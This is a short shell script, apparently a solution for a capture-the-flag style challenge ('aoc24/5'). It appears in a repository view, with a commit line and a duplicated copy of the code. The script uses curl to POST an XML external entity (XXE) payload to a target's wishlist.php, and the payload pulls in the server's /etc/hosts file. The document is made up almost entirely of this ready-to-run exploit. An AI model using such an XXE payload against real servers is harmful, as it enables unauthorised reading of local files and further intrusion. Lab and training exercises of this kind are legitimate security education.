aoc24/5/wishlist.sh

#!/bin/sh
target=`cat trgt`
curl -iH 'Content-Type: application/xml' "http://$target/wishlist.php" \
 -d '<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
<wishlist>
  <user_id>1</user_id>
     <item>
       <product_id>&payload;</product_id>
     </item>
</wishlist>'
batman 2024-12-08 17:19:06 +01:00			`#!/bin/sh`
			target=`cat trgt`
			`curl -iH 'Content-Type: application/xml' "http://$target/wishlist.php" \`
			`-d '<!--?xml version="1.0" ?-->`
			`<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>`
			`<wishlist>`
			`<user_id>1</user_id>`
			`<item>`
			`<product_id>&payload;</product_id>`
			`</item>`
			`</wishlist>'`